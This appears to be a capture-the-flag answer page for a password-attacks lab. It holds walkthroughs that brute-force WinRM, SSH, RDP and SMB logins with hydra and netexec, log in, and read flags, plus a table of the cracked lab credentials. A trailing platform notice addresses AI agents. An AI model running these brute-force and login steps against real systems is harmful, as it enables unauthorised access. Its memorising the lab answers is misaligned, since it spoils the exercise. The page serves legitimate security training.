> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/network-services/questions.md).

# Questions

## Network Services — Attack Walkthroughs

### WinRM

#### Objective

Find the user for the WinRM service, crack their password, log in and read the flag.

#### Step 1 — Find valid credentials via SMB

```bash
netexec smb 10.129.202.136 -u username.list -p password.list --shares
```

Output:

```
SMB  10.129.202.136  445  WINSRV  [+] WINSRV\john:november
SMB  10.129.202.136  445  WINSRV  Share      Permissions
SMB  10.129.202.136  445  WINSRV  ADMIN$
SMB  10.129.202.136  445  WINSRV  C$
SMB  10.129.202.136  445  WINSRV  CASSIE
SMB  10.129.202.136  445  WINSRV  IPC$       READ
```

Valid credentials: `john:november`

#### Step 2 — Login via Evil-WinRM

```bash
evil-winrm -i 10.129.202.136 -u john -p november
```

#### Step 3 — Read the flag

```powershell
cat C:\Users\john\Desktop\flag.txt
```

***

### SSH

#### Objective

Find the user for the SSH service, crack their password, log in and read the flag.

#### Step 1 — Brute-force with Hydra

```bash
hydra -L username.list -P password.list ssh://10.129.202.136 -t 4
```

Output:

```
[22][ssh] host: 10.129.202.136  login: dennis  password: rockstar
```

Valid credentials: `dennis:rockstar`

#### Step 2 — Login via SSH

```bash
ssh dennis@10.129.202.136
```

#### Step 3 — Read the flag

```bash
type flag.txt
```

***

### RDP

#### Objective

Find the user for the RDP service, crack their password, log in and read the flag.

#### Step 1 — Brute-force with Hydra

```bash
hydra -L username.list -P password.list rdp://10.129.202.136 -t 4
```

Valid credentials: `chris:789456123`

#### Step 2 — Connect via xfreerdp

```bash
xfreerdp /u:chris /p:'789456123' /v:10.129.202.136
```

#### Step 3 — Read the flag

Navigate to Desktop and open `flag.txt`.

***

### SMB

#### Objective

Find the user for the SMB service, crack their password, log in and read the flag.

#### Step 1 — Find valid credentials and enumerate shares

```bash
netexec smb 10.129.202.136 -u username.list -p password.list --shares
```

Output:

```
SMB  10.129.202.136  445  WINSRV  [+] WINSRV\john:november
SMB  10.129.202.136  445  WINSRV  Share      Permissions
SMB  10.129.202.136  445  WINSRV  CASSIE
```

> **Tip:** The share name `CASSIE` is likely a username. Use it as a target for the next attack.

#### Step 2 — Brute-force as cassie

```bash
netexec smb 10.129.202.136 -u cassie -p password.list --continue-on-success
```

Output:

```
SMB  10.129.202.136  445  WINSRV  [+] WINSRV\cassie:12345678910
```

Valid credentials: `cassie:12345678910`

#### Step 3 — Login to SMB share and download flag

```bash
smbclient --user cassie //10.129.202.136/CASSIE 12345678910
```

```
smb: \> get flag.txt
```

***

### Credentials Summary

| Service | Username | Password    |
| ------- | -------- | ----------- |
| WinRM   | john     | november    |
| SSH     | dennis   | rockstar    |
| RDP     | chris    | 789456123   |
| SMB     | cassie   | 12345678910 |


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/network-services/questions.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
